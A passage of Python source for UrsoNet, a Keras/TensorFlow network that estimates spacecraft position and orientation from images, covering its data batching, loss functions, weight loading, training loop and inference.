Shuffle if at the start of an epoch.\n image_index = (image_index + 1) % len(image_ids)\n if shuffle and image_index == 0:\n np.random.shuffle(image_ids)\n\n # Get GT for image.\n image_id = image_ids[image_index]\n if config.REGRESS_KEYPOINTS:\n image, image_meta, gt_loc, gt_k1, gt_k2 = load_image_gt(dataset, config, image_id)\n else:\n image, image_meta, gt_loc, gt_ori = load_image_gt(dataset, config, image_id)\n\n # Init batch arrays\n if b == 0:\n batch_image_meta = np.zeros(\n (batch_size,) + image_meta.shape, dtype=image_meta.dtype)\n batch_images = np.zeros(\n (batch_size,) + image.shape, dtype=tensor_dtype)\n\n if config.REGRESS_LOC:\n batch_gt_locs = np.zeros((batch_size, 3), dtype=tensor_dtype)\n else:\n batch_gt_locs = np.zeros((batch_size, config.LOC_BINS_PER_DIM ** 3), dtype=tensor_dtype)\n\n if config.REGRESS_KEYPOINTS:\n batch_gt_k1 = np.zeros((batch_size, 3), dtype=tensor_dtype)\n batch_gt_k2 = np.zeros((batch_size, 3), dtype=tensor_dtype)\n else:\n if config.REGRESS_ORI:\n if config.ORIENTATION_PARAM == 'quaternion':\n batch_gt_oris = np.zeros((batch_size, 4), dtype=tensor_dtype)\n else:\n batch_gt_oris = np.zeros((batch_size, 3), dtype=tensor_dtype)\n else:\n batch_gt_oris = np.zeros((batch_size, config.ORI_BINS_PER_DIM ** 3), dtype=tensor_dtype)\n\n # Add to batch\n batch_image_meta[b] = image_meta\n batch_images[b] = mold_image(image.astype(tensor_dtype), config)\n batch_gt_locs[b] = gt_loc\n\n if config.REGRESS_KEYPOINTS:\n batch_gt_k1[b] = gt_k1\n batch_gt_k2[b] = gt_k2\n else:\n batch_gt_oris[b] = gt_ori\n\n b += 1\n\n # Batch full?\n if b >= batch_size:\n if config.REGRESS_KEYPOINTS:\n inputs = [batch_images, batch_image_meta, batch_gt_locs, batch_gt_k1, batch_gt_k2]\n else:\n inputs = [batch_images, batch_image_meta, batch_gt_locs, batch_gt_oris]\n\n\n outputs = []\n\n yield inputs, outputs\n\n # start a new batch\n b = 0\n except (GeneratorExit, KeyboardInterrupt):\n raise\n except:\n # Log it and skip the image\n logging.exception(\"Error processing image {}\".format(\n dataset.image_info[image_id]))\n error_count += 1\n if error_count > 5:\n raise\n\n\n############################################################\n# NNetwork Class and Graph Initialization\n############################################################\n\nclass UrsoNet():\n\n def __init__(self, mode, config, model_dir):\n \"\"\"\n mode: Either \"training\" or \"inference\"\n config: A Sub-class of the Config class\n model_dir: Directory to save training logs and trained weights\n \"\"\"\n assert mode in ['training', 'inference']\n self.mode = mode\n self.config = config\n self.model_dir = model_dir\n self.set_log_dir()\n self.keras_model = self.build(mode=mode, config=config)\n\n def build(self, mode, config):\n \"\"\"Build UrsoNet architecture.\n input_shape: The shape of the input image.\n mode: Either \"training\" or \"inference\". The inputs and\n outputs of the model differ accordingly.\n \"\"\"\n assert mode in ['training', 'inference']\n\n # Change Keras backend to use f16 precision\n if config.F16:\n K.set_floatx('float16')\n # default is 1e-7 which is too small for float16. 
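            # (Concretely, float16 carries only about 3 significant decimal
            # digits:
            #     np.float16(1.0) + np.float16(1e-7) == np.float16(1.0)  # True
            # so a fuzz term of 1e-7 vanishes next to typical activations,
            # hence the larger epsilon of 1e-4 set here.)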
Without adjusting the epsilon, we will get NaN predictions because of divide by zero problems\n K.set_epsilon(1e-4)\n\n # Image size must be dividable by 2 multiple times\n h, w = config.IMAGE_SHAPE[:2]\n if h / 2 ** 6 != int(h / 2 ** 6) or w / 2 ** 6 != int(w / 2 ** 6):\n raise Exception(\"Image size must be dividable by 2 at least 6 times \"\n \"to avoid fractions when downscaling and upscaling.\"\n \"For example, use 256, 320, 384, 448, 512, ... etc. \")\n\n # Inputs\n input_image = KL.Input(shape=[None, None, config.NR_IMAGE_CHANNELS], name=\"input_image\")\n input_image_meta = KL.Input(shape=[config.IMAGE_META_SIZE], name=\"input_image_meta\")\n\n tensor_dtype = tf.float32\n if config.F16:\n tensor_dtype = tf.float16\n\n if mode == \"training\":\n\n if config.REGRESS_LOC:\n input_gt_loc = KL.Input(shape=[3], name=\"input_gt_loc\", dtype=tensor_dtype)\n else:\n input_gt_loc = KL.Input(shape=[config.LOC_BINS_PER_DIM**3], name=\"input_gt_loc\", dtype=tensor_dtype)\n\n if config.REGRESS_KEYPOINTS:\n input_gt_k2 = KL.Input(shape=[3], name=\"input_gt_k2\", dtype=tensor_dtype)\n input_gt_k3 = KL.Input(shape=[3], name=\"input_gt_k3\", dtype=tensor_dtype)\n else:\n if config.REGRESS_ORI:\n if config.ORIENTATION_PARAM == 'quaternion':\n input_gt_ori = KL.Input(shape=[4], name=\"input_gt_ori\", dtype=tensor_dtype)\n else:\n input_gt_ori = KL.Input(shape=[3], name=\"input_gt_ori\", dtype=tensor_dtype)\n else:\n input_gt_ori = KL.Input(shape=[config.ORI_BINS_PER_DIM ** 3], name=\"input_gt_ori\", dtype=tensor_dtype)\n\n # Backbone architecture\n if config.BACKBONE in ['resnet50', 'resnet101']:\n _, C2, C3, C4, C5 = resnet_graph(input_image, config.BACKBONE, stage5=True, train_bn=config.TRAIN_BN)\n else:\n C5 = resnet_shallow_graph(input_image, config.BACKBONE, train_bn=config.TRAIN_BN)\n\n # Original Resnet uses a 7x7 average pooling:\n # C6 = KL.GlobalAveragePooling2D()(C5)\n # but because we care about resolution, instead we perform here a convolution\n\n C6 = KL.Conv2D(config.BOTTLENECK_WIDTH, (3, 3), padding='SAME', strides=(2, 2), name='bottleneck_layer')(C5)\n nr_features = int(config.BOTTLENECK_WIDTH * config.IMAGE_SHAPE[0] * config.IMAGE_SHAPE[1] / (64 ** 2))\n\n loc_pred = build_loc_graph(C6, config, nr_features)\n ori_pred = build_ori_graph(C6, config, nr_features)\n\n if mode == \"training\":\n\n # Experimental feature\n if config.LEARNABLE_LOSS_WEIGHTS:\n self.ori_weight = K.variable(-2.3, name= 'ori_weight')\n self.loc_weight = K.variable(0.0, name= 'loc_weight')\n else:\n # Default\n self.ori_weight = K.variable(0.0, name= 'ori_weight')\n self.loc_weight = K.variable(0.0)\n\n if config.REGRESS_KEYPOINTS:\n loc_loss = KL.Lambda(lambda x: self.mse_loss_graph(*x), name=\"loc_loss\")([input_gt_loc, loc_pred[0]])\n k2_loss = KL.Lambda(lambda x: self.mse_loss_graph(*x), name=\"k2_loss\")([input_gt_k2, loc_pred[1]])\n k3_loss = KL.Lambda(lambda x: self.mse_loss_graph(*x), name=\"k3_loss\")([input_gt_k3, loc_pred[2]])\n else:\n if config.REGRESS_LOC:\n loc_loss = KL.Lambda(lambda x: self.rel_loss_graph(*x), name=\"loc_loss\")([input_gt_loc, loc_pred])\n else:\n loc_loss = KL.Lambda(lambda x: self.softmax_loss_graph(*x), name=\"loc_loss\")([input_gt_loc, loc_pred])\n\n if config.REGRESS_ORI:\n ori_loss = KL.Lambda(lambda x: self.one_minus_dot_prod_graph(*x), name=\"ori_loss\")([input_gt_ori, ori_pred])\n else:\n ori_loss = KL.Lambda(lambda x: self.softmax_loss_graph(*x), name=\"ori_loss\")([input_gt_ori, ori_pred])\n\n # Model\n if config.REGRESS_KEYPOINTS:\n inputs = [input_image, 
input_image_meta, input_gt_loc, input_gt_k2, input_gt_k3]\n else:\n inputs = [input_image, input_image_meta, input_gt_loc, input_gt_ori]\n\n if config.REGRESS_KEYPOINTS:\n outputs = [loc_pred[0], loc_pred[1], loc_pred[2], loc_loss, k2_loss, k3_loss]\n else:\n outputs = [loc_pred, ori_pred, loc_loss, ori_loss]\n\n model = KM.Model(inputs, outputs, name='urso_net')\n\n # Workaround to make weights trainable\n if config.LEARNABLE_LOSS_WEIGHTS:\n model.layers[-1].trainable_weights.extend([self.ori_weight, self.loc_weight])\n else:\n if config.REGRESS_KEYPOINTS:\n model = KM.Model(input_image, [loc_pred[0], loc_pred[1], loc_pred[2]], name='urso_net')\n else:\n model = KM.Model(input_image, [loc_pred, ori_pred], name='urso_net')\n\n\n # Add multi-GPU support.\n # if config.GPU_COUNT > 1:\n # from mrcnn.parallel_model import ParallelModel\n # model = ParallelModel(model, config.GPU_COUNT)\n\n return model\n\n ############################################################\n # Loss Functions\n ############################################################\n\n def softmax_loss_graph(self, y_gt, y_pred):\n \"\"\"Loss for classification prediction.\n \"\"\"\n # Experimental: Adaptive weighting based on Laplace likelihood (Kendall & Cipolla)\n # loss = tf.losses.softmax_cross_entropy(y_gt, y_pred)/tf.exp(self.ori_weight) + self.ori_weight\n loss = tf.losses.softmax_cross_entropy(y_gt, y_pred)\n return loss\n\n def arcos_graph(self, y_true, y_pred):\n \"\"\"Implements rotation error\n y_true and y_pred are typicallly: [N, 4], but could be any shape.\n \"\"\"\n loss = tf.acos(K.abs(K.sum(y_true * y_pred, axis=-1, keepdims=True)))\n # Experimental: Adaptive weighting based on Laplace likelihood (Kendall & Cipolla)\n # loss = loss/tf.exp(self.ori_weight) + self.ori_weight\n loss_mean = K.mean(loss)\n\n return loss_mean\n\n def one_minus_dot_prod_graph(self, y_true, y_pred):\n \"\"\"Implements 1-dot-product.\n y_true and y_pred are typicallly: [N, 4], but could be any shape.\n \"\"\"\n loss = 1 - K.abs(K.sum(y_true * y_pred, axis=-1, keepdims=True))\n # Experimental: Adaptive weighting based on Laplace likelihood (Kendall & Cipolla)\n # loss = loss / tf.exp(self.ori_weight) + self.ori_weight\n loss_mean = K.mean(loss)\n\n return loss_mean\n\n def mse_loss_graph(self, y_gt, y_pred):\n \"\"\"Loss for regression prediction.\n e.g.\n pose_gt: [batch, (x,y,z)]\n pose_pred: [batch, (x,y,z)]\n \"\"\"\n loss = K.square(y_gt - y_pred)\n\n # Experimental: Adaptive weighting based on Laplace likelihood (Kendall & Cipolla)\n # loss_mse = K.square(y_gt - y_pred)\n # loss = loss_mse/tf.exp(self.loc_weight) + self.loc_weight\n loss_mean = K.mean(loss)\n\n return loss_mean\n\n def rel_loss_graph(self, y_gt, y_pred):\n \"\"\"Loss for regression prediction.\n e.g.\n pose_gt: [batch, (x,y,z)]\n pose_pred: [batch, (x,y,z)]\n \"\"\"\n\n loss = tf.norm((y_gt - y_pred) / tf.norm(y_gt))\n\n # Experimental: Adaptive weighting based on Laplace likelihood (Kendall & Cipolla)\n # loss = loss/tf.exp(self.loc_weight) + self.loc_weight\n loss_mean = K.mean(loss)\n return loss_mean\n\n ############################################################\n # Weights Loading Functions\n ############################################################\n\n def get_last_checkpoint(self,model_name):\n \"\"\"Finds the last checkpoint file of a selected trained model in the\n model directory.\n Returns:\n log_dir: The directory where events and weights are saved\n checkpoint_path: the path to the last checkpoint file\n \"\"\"\n dir_names = 
next(os.walk(self.model_dir))[1]\n\n assert model_name in dir_names\n\n model_path = os.path.join(self.model_dir, model_name)\n checkpoints = next(os.walk(model_path))[2]\n checkpoints = filter(lambda f: f.startswith(\"weights\"), checkpoints)\n checkpoints = sorted(checkpoints)\n\n if not checkpoints:\n return model_path, None\n checkpoint = os.path.join(model_path, checkpoints[-1])\n\n return model_path, checkpoint\n\n\n def find_last(self):\n \"\"\"Finds the last checkpoint file of the last trained model in the\n model directory.\n Returns:\n log_dir: The directory where events and weights are saved\n checkpoint_path: the path to the last checkpoint file\n \"\"\"\n # Get directory names. Each directory corresponds to a model\n dir_names = next(os.walk(self.model_dir))[1]\n key = self.config.NAME.lower()\n dir_names = filter(lambda f: f.startswith(key), dir_names)\n dir_names = sorted(dir_names)\n if not dir_names:\n return None, None\n # Pick last directory\n dir_name = os.path.join(self.model_dir, dir_names[-1])\n # Find the last checkpoint\n checkpoints = next(os.walk(dir_name))[2]\n checkpoints = filter(lambda f: f.startswith(\"weights\"), checkpoints)\n checkpoints = sorted(checkpoints)\n if not checkpoints:\n return dir_name, None\n checkpoint = os.path.join(dir_name, checkpoints[-1])\n return dir_name, checkpoint\n\n def load_weights(self, weights_in_path, weights_out_path, by_name=False, exclude=None):\n \"\"\"Modified version of the correspoding Keras function with\n the addition of multi-GPU support and the ability to exclude\n some layers from loading.\n exlude: list of layer names to exclude\n \"\"\"\n import h5py\n from keras.engine import topology\n\n if exclude:\n by_name = True\n\n if h5py is None:\n raise ImportError('`load_weights` requires h5py.')\n f = h5py.File(weights_in_path, mode='r')\n if 'layer_names' not in f.attrs and 'model_weights' in f:\n f = f['model_weights']\n\n # In multi-GPU training, we wrap the model. 
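        # (Note: passing `exclude` forces by_name=True above, so weights are
        # matched to layers by layer name rather than by topological order;
        # this is what lets a backbone-only checkpoint load cleanly when the
        # pose heads differ from the network that produced the file.)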
Get layers\n # of the inner model because they have the weights.\n keras_model = self.keras_model\n layers = keras_model.inner_model.layers if hasattr(keras_model, \"inner_model\") \\\n else keras_model.layers\n\n # Exclude some layers\n if exclude:\n layers = filter(lambda l: l.name not in exclude, layers)\n\n if by_name:\n topology.load_weights_from_hdf5_group_by_name(f, layers)\n else:\n topology.load_weights_from_hdf5_group(f, layers)\n if hasattr(f, 'close'):\n f.close()\n\n # Update the log directory\n self.set_log_dir(weights_out_path)\n\n def get_imagenet_weights(self, architecture):\n \"\"\"Downloads ImageNet trained weights from Keras.\n Returns path to weights file.\n \"\"\"\n from keras.utils.data_utils import get_file\n\n if architecture in ['resnet50', 'resnet101']:\n TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/' \\\n 'releases/download/v0.2/' \\\n 'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'\n weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5',\n TF_WEIGHTS_PATH_NO_TOP,\n cache_subdir='models',\n md5_hash='a268eb855778b3df3c7506639542a6af')\n elif architecture == 'resnet18':\n\n TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/qubvel/classification_models/'\\\n 'releases/download/0.0.1/resnet18_imagenet_1000_no_top.h5'\n weights_path = get_file('resnet18_imagenet_1000_no_top.h5',\n TF_WEIGHTS_PATH_NO_TOP,\n cache_subdir='models',\n md5_hash='318e3ac0cd98d51e917526c9f62f0b50')\n elif architecture == 'resnet34':\n\n TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/qubvel/classification_models/'\\\n 'releases/download/0.0.1/resnet34_imagenet_1000_no_top.h5'\n weights_path = get_file('resnet34_imagenet_1000_no_top.h5',\n TF_WEIGHTS_PATH_NO_TOP,\n cache_subdir='models',\n md5_hash='8caaa0ad39d927cb8ba5385bf945d582')\n return weights_path\n\n def get_urso_weights(self, dataset_name):\n \"\"\"Downloads URSO trained weights from Keras.\n Returns path to weights file.\n \"\"\"\n\n assert dataset_name in ['soyuz_hard', 'dragon_hard', 'speed']\n\n from keras.utils.data_utils import get_file\n\n if dataset_name == \"soyuz_hard\":\n\n assert self.config.BACKBONE == 'resnet50'\n assert self.config.BOTTLENECK_WIDTH == 128\n assert self.config.ORI_BINS_PER_DIM == 24\n\n weights_name = 'resnet50_soyuz_hard_128_24.h5'\n\n TF_WEIGHTS_PATH = 'https://github.com/pedropro/UrsoNet/releases/download/v1.0/' + weights_name\n\n elif dataset_name == \"dragon_hard\":\n\n assert self.config.BACKBONE == 'resnet50'\n assert self.config.BOTTLENECK_WIDTH == 128\n assert self.config.ORI_BINS_PER_DIM == 24\n\n weights_name = 'resnet50_dragon_hard_128_24.h5'\n\n TF_WEIGHTS_PATH = 'https://github.com/pedropro/UrsoNet/releases/download/v1.0\\/' + weights_name\n\n\n elif dataset_name == \"speed\":\n\n assert self.config.BACKBONE == 'resnet101'\n\n if self.config.ORI_BINS_PER_DIM == 32:\n\n assert self.config.BOTTLENECK_WIDTH == 528\n\n weights_name = 'resnet101_speed_528_32.h5'\n\n TF_WEIGHTS_PATH = 'https://github.com/pedropro/UrsoNet/releases/download/v1.0/' + weights_name\n\n\n elif self.config.ORI_BINS_PER_DIM == 64:\n\n assert self.config.BOTTLENECK_WIDTH == 800\n\n weights_name = 'resnet101_speed_800_64.h5'\n\n TF_WEIGHTS_PATH = 'https://github.com/pedropro/UrsoNet/releases/download/v1.0/' + weights_name\n\n\n weights_path = get_file(weights_name,TF_WEIGHTS_PATH,cache_subdir='models')\n\n return weights_path\n\n\n\n def set_log_dir(self, model_path=None):\n \"\"\"Sets the model log directory and epoch counter.\n\n model_path: If None, or a format 
different from what this code uses\n then set a new log directory and start epochs from 0. Otherwise,\n extract the log directory and the epoch counter from the file\n name.\n \"\"\"\n\n if model_path:\n # Directory for training logs\n self.log_dir = os.path.dirname(model_path)\n self.epoch = int(model_path[-6:-3])\n else:\n self.epoch = 0\n now = datetime.datetime.now()\n self.log_dir = os.path.join(self.model_dir, \"{}{:%Y%m%dT%H%M}\".format(\n self.config.NAME.lower(), now))\n\n # Path to save after each epoch. Include placeholders that get filled by Keras.\n self.checkpoint_path = os.path.join(self.log_dir, \"weights_{}_*epoch*.h5\".format(\n self.config.NAME.lower()))\n self.checkpoint_path = self.checkpoint_path.replace(\n \"*epoch*\", \"{epoch:04d}\")\n\n ############################################################\n # Weights Loading Functions\n ############################################################\n\n def compile(self, learning_rate, momentum):\n \"\"\"Gets the model ready for training. Adds losses, regularization, and\n metrics. Then calls the Keras compile() function.\n \"\"\"\n\n # Optimizer object\n if self.config.OPTIMIZER == 'SGD':\n optimizer = keras.optimizers.SGD(lr=learning_rate, momentum=momentum,\n clipnorm=self.config.GRADIENT_CLIP_NORM)\n else:\n optimizer = keras.optimizers.Adam(learning_rate, amsgrad=True, clipnorm=self.config.GRADIENT_CLIP_NORM)\n\n # Add Losses\n # First, clear previously set losses to avoid duplication\n self.keras_model._losses = []\n self.keras_model._per_input_losses = {}\n if self.config.REGRESS_KEYPOINTS:\n loss_names = [\"loc_loss\", \"k2_loss\", \"k3_loss\"]\n else:\n loss_names = [\"loc_loss\", \"ori_loss\"]\n for name in loss_names:\n layer = self.keras_model.get_layer(name)\n if layer.output in self.keras_model.losses:\n continue\n loss = (\n tf.reduce_mean(layer.output, keepdims=True)\n * self.config.LOSS_WEIGHTS.get(name, 1.))\n self.keras_model.add_loss(loss)\n\n tensor_dtype = tf.float32\n if self.config.F16:\n tensor_dtype = tf.float16\n\n # Add L2 Regularization\n # Skip gamma and beta weights of batch normalization layers.\n reg_losses = [\n keras.regularizers.l2(self.config.WEIGHT_DECAY)(w) / tf.cast(tf.size(w), tensor_dtype)\n for w in self.keras_model.trainable_weights\n if 'gamma' not in w.name and 'beta' not in w.name]\n self.keras_model.add_loss(tf.add_n(reg_losses))\n\n # Compile\n self.keras_model.compile(\n optimizer=optimizer,\n loss=[None] * len(self.keras_model.outputs))\n\n # Add metrics for losses\n for name in loss_names:\n if name in self.keras_model.metrics_names:\n continue\n layer = self.keras_model.get_layer(name)\n self.keras_model.metrics_names.append(name)\n loss = (\n tf.reduce_mean(layer.output, keepdims=True)\n * self.config.LOSS_WEIGHTS.get(name, 1.))\n self.keras_model.metrics_tensors.append(loss)\n\n def set_trainable(self, layer_regex, keras_model=None, indent=0, verbose=1):\n \"\"\"Sets model layers as trainable if their names match\n the given regular expression.\n \"\"\"\n # Print message on the first call (but not on recursive calls)\n if verbose > 0 and keras_model is None:\n log(\"Selecting layers to train\")\n\n keras_model = keras_model or self.keras_model\n\n # In multi-GPU training, we wrap the model. 
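        # (Selection is by full-name regex match through re.fullmatch below;
        # e.g. the pre-defined "heads" pattern matches layers such as
        # ori_dense_0, loc_dense_0 and bottleneck_layer while leaving the
        # ResNet backbone frozen.)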
Get layers\n # of the inner model because they have the weights.\n layers = keras_model.inner_model.layers if hasattr(keras_model, \"inner_model\") \\\n else keras_model.layers\n\n for layer in layers:\n # Is the layer a model?\n if layer.__class__.__name__ == 'Model':\n print(\"In model: \", layer.name)\n self.set_trainable(\n layer_regex, keras_model=layer, indent=indent + 4)\n continue\n\n if not layer.weights:\n continue\n\n # Is it trainable?\n trainable = bool(re.fullmatch(layer_regex, layer.name))\n # Update layer. If layer is a container, update inner layer.\n if layer.__class__.__name__ == 'TimeDistributed':\n layer.layer.trainable = trainable\n else:\n layer.trainable = trainable\n # Print trainble layer names\n if trainable and verbose > 0:\n log(\"{}{:20} ({})\".format(\" \" * indent, layer.name,\n layer.__class__.__name__))\n\n def train(self, train_dataset, val_dataset, learning_rate, epochs, layers):\n \"\"\"Train the model.\n train_dataset, val_dataset: Training and validation Dataset objects.\n learning_rate: The learning rate to train with\n epochs: Number of training epochs.\n layers: Allows selecting wich layers to train. It can be:\n - A regular expression to match layer names to train\n - One of these predefined values:\n heaads: The RPN, classifier and mask heads of the network\n all: All the layers\n 3+: Train Resnet stage 3 and up\n 4+: Train Resnet stage 4 and up\n 5+: Train Resnet stage 5 and up\n \"\"\"\n assert self.mode == \"training\", \"Create model in training mode.\"\n\n # Pre-defined layer regular expressions\n # All options except 'all' are only currently valid for resnet50 and renet101 models\n layer_regex = {\n # all layers but the backbone\n \"heads\": r\"(ori\\_.*)|(loc\\_.*)|(fpn\\_.*)|(bottleneck_layer)\",\n # From a specific Resnet stage and up\n \"3+\": r\"(res3.*)|(bn3.*)|(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(loc\\_.*)|(ori\\_.*)|(fpn\\_.*)|(bottleneck_layer)\",\n \"4+\": r\"(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(loc\\_.*)|(ori\\_.*)|(fpn\\_.*)|(bottleneck_layer)\",\n \"5+\": r\"(res5.*)|(bn5.*)|(loc\\_.*)|(ori\\_.*)|(fpn\\_.*)|(bottleneck_layer)\",\n # All layers\n \"all\": \".*\",\n }\n if layers in layer_regex.keys():\n layers = layer_regex[layers]\n\n # Data generators\n train_generator = data_generator(train_dataset, self.config, shuffle=True,\n batch_size=self.config.BATCH_SIZE)\n val_generator = data_generator(val_dataset, self.config, shuffle=True,\n batch_size=self.config.BATCH_SIZE)\n\n # Callbacks\n class BatchLogger(tf.keras.callbacks.Callback):\n def __init__(self):\n self.ori_loss_acc = []\n self.loc_loss_acc = []\n\n def on_batch_end(self, batch, logs={}):\n self.ori_loss_acc.append(logs.get('ori_loss'))\n self.loc_loss_acc.append(logs.get('loc_loss'))\n\n history_full = BatchLogger()\n\n callbacks = [\n keras.callbacks.TensorBoard(log_dir=self.log_dir,\n histogram_freq=0, write_graph=True, write_images=False),\n keras.callbacks.ModelCheckpoint(self.checkpoint_path,\n verbose=0, save_weights_only=True),\n history_full\n ]\n\n if self.config.CLR:\n import clr_callback\n\n clr_triangular = clr_callback.CyclicLR(self.config.BASE_LEARNING_RATE, self.config.MAX_LEARNING_RATE,\n self.config.CLR_STEP_SIZE, mode='triangular')\n callbacks.append(clr_triangular)\n\n\n # Train\n log(\"\\nStarting at epoch {}. 
LR={}\\n\".format(self.epoch, learning_rate))\n log(\"Checkpoint Path: {}\".format(self.checkpoint_path))\n self.set_trainable(layers)\n self.compile(learning_rate, self.config.LEARNING_MOMENTUM)\n\n # TODO: print('Total FLOPs',get_flops(self))\n\n # print('Orientation var:', K.eval(K.exp(self.ori_weight)))\n # print('Location var:', K.eval(K.exp(self.loc_weight)))\n\n # Work-around for Windows: Keras fails on Windows when using\n # multiprocessing workers. See discussion here:\n # https://github.com/matterport/Mask_RCNN/issues/13#issuecomment-353124009\n if os.name is 'nt':\n workers = 0\n else:\n workers = multiprocessing.cpu_count()\n\n hist = self.keras_model.fit_generator(\n train_generator,\n initial_epoch=self.epoch,\n epochs=epochs,\n steps_per_epoch=self.config.STEPS_PER_EPOCH,\n callbacks=callbacks,\n validation_data=val_generator,\n validation_steps=self.config.VALIDATION_STEPS,\n max_queue_size=100,\n workers=workers,\n use_multiprocessing=True,\n )\n\n self.epoch = max(self.epoch, epochs)\n\n return history_full\n\n def mold_inputs(self, images):\n \"\"\"Takes a list of images and modifies them to the format expected\n as an input to the neural network.\n images: List of image matricies [height,width,depth]. Images can have\n different sizes.\n\n Returns 3 Numpy matricies:\n molded_images: [N, h, w, 3]. Images resized and normalized.\n image_metas: [N, length of meta data]. Details about each image.\n windows: [N, (y1, x1, y2, x2)]. The portion of the image that has the\n original image (padding excluded).\n \"\"\"\n molded_images = []\n image_metas = []\n windows = []\n for image in images:\n # Resize image\n # TODO: move resizing to mold_image()\n molded_image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=self.config.IMAGE_MIN_DIM,\n min_scale=self.config.IMAGE_MIN_SCALE,\n max_dim=self.config.IMAGE_MAX_DIM,\n mode=self.config.IMAGE_RESIZE_MODE)\n molded_image = mold_image(molded_image, self.config)\n # Build image_meta\n image_meta = compose_image_meta(\n 0, image.shape, molded_image.shape, window, scale)\n # Append\n molded_images.append(molded_image)\n windows.append(window)\n image_metas.append(image_meta)\n # Pack into arrays\n molded_images = np.stack(molded_images)\n image_metas = np.stack(image_metas)\n windows = np.stack(windows)\n return molded_images, image_metas, windows\n\n def detect(self, images, verbose=0):\n \"\"\"Runs the detection pipeline.\n\n images: List of images, potentially of different sizes.\n\n Returns a list of dicts, one dict per image. The dict contains:\n rois: [N, (y1, x1, y2, x2)] detection bounding boxes\n class_ids: [N] int class IDs\n scores: [N] float probability scores for the class IDs\n masks: [H, W, N] instance binary masks\n \"\"\"\n assert self.mode == \"inference\", \"Create model in inference mode.\"\n assert len(\n images) == self.config.BATCH_SIZE, \"len(images) must be equal to BATCH_SIZE\"\n\n if verbose:\n log(\"Processing {} images\".format(len(images)))\n for image in images:\n log(\"image\", image)\n\n # Mold inputs to format expected by the neural network\n molded_images, image_metas, windows = self.mold_inputs(images)\n\n # Validate image sizes\n # All images in a batch MUST be of the same size\n image_shape = molded_images[0].shape\n for g in molded_images[1:]:\n assert g.shape == image_shape, \\\n \"After resizing, all images must have the same size. 
Check IMAGE_RESIZE_MODE and image sizes.\"\n if verbose:\n log(\"molded_images\", molded_images)\n log(\"image_metas\", image_metas)\n # Run object detection\n if self.config.REGRESS_KEYPOINTS:\n loc_pred, k1_pred, k2_pred = self.keras_model.predict(molded_images, verbose=0)\n # Process detections\n results = []\n for i, image in enumerate(images):\n results.append({\n \"loc\": loc_pred[i],\n \"k1\": k1_pred[i],\n \"k2\": k2_pred[i],\n })\n else:\n loc_pred, ori_pred = self.keras_model.predict(molded_images, verbose=0)\n # Process detections\n results = []\n for i, image in enumerate(images):\n results.append({\n \"loc\": loc_pred[i],\n \"ori\": ori_pred[i],\n })\n return results\n\n def ancestor(self, tensor, name, checked=None):\n \"\"\"Finds the ancestor of a TF tensor in the computation graph.\n tensor: TensorFlow symbolic tensor.\n name: Name of ancestor tensor to find\n checked: For internal use. A list of tensors that were already\n searched to avoid loops in traversing the graph.\n \"\"\"\n checked = checked if checked is not None else []\n # Put a limit on how deep we go to avoid very long loops\n if len(checked) > 500:\n return None\n # Convert name to a regex and allow matching a number prefix\n # because Keras adds them automatically\n if isinstance(name, str):\n name = re.compile(name.replace(\"/\", r\"(\\_\\d+)*/\"))\n\n parents = tensor.op.inputs\n for p in parents:\n if p in checked:\n continue\n if bool(re.fullmatch(name, p.name)):\n return p\n checked.append(p)\n a = self.ancestor(p, name, checked)\n if a is not None:\n return a\n return None\n\n def find_trainable_layer(self, layer):\n \"\"\"If a layer is encapsulated by another layer, this function\n digs through the encapsulation and returns the layer that holds\n the weights.\n \"\"\"\n if layer.__class__.__name__ == 'TimeDistributed':\n return self.find_trainable_layer(layer.layer)\n return layer\n\n def get_trainable_layers(self):\n \"\"\"Returns a list of layers that have weights.\"\"\"\n layers = []\n # Loop through all layers\n for l in self.keras_model.layers:\n # If layer is a wrapper, find inner trainable layer\n l = self.find_trainable_layer(l)\n # Include layer if it has weights\n if l.get_weights():\n layers.append(l)\n return layers\n\n############################################################\n# Data Formatting\n############################################################\n\ndef compose_image_meta(image_id, original_image_shape, image_shape,\n window, scale):\n \"\"\"Takes attributes of an image and puts them in one 1D array.\n\n image_id: An int ID of the image. Useful for debugging.\n original_image_shape: [H, W, C] before resizing or padding.\n image_shape: [H, W, C] after resizing and padding\n window: (y1, x1, y2, x2) in pixels. The area of the image where the real\n image is (excluding the padding)\n scale: The scaling factor applied to the original image (float32)\n active_class_ids: List of class_ids available in the dataset from which\n the image came. 
Useful if training on images from multiple datasets\n        where not all classes are present in all datasets.\n    \"\"\"\n    meta = np.array(\n        [image_id] +                  # size=1\n        list(original_image_shape) +  # size=3\n        list(image_shape) +           # size=3\n        list(window) +                # size=4 (y1, x1, y2, x2) in image coords\n        [scale]                       # size=1\n    )\n    return meta\n\ndef mold_image(image, config):\n    \"\"\"Subtracts the mean pixel and converts the image to float.\n    \"\"\"\n\n    tensor_dtype = np.float32\n    if config.F16:\n        tensor_dtype = np.float16\n\n    if image.shape[-1]==3:\n        return image.astype(tensor_dtype) - config.MEAN_PIXEL\n    else:\n        return image.astype(tensor_dtype) - np.mean(config.MEAN_PIXEL)\n\n\ndef unmold_image(normalized_images, config):\n    \"\"\"Takes an image normalized with mold() and returns the original.\n    TODO: This does not accept grayscale\"\"\"\n\n    return (normalized_images + config.MEAN_PIXEL).astype(np.uint8)\n\n############################################################\n#  Profiling Functions\n############################################################\n\ndef get_flops(model):\n    run_meta = tf.RunMetadata()\n    opts = tf.profiler.ProfileOptionBuilder.float_operation()\n\n    # We use the Keras session graph in the call to the profiler.\n    flops = tf.profiler.profile(graph=K.get_session().graph,\n                                run_meta=run_meta, cmd='op', options=opts)\n\n    return flops.total_float_ops  # Prints the \"flops\" of the model.\n\n","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":55371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
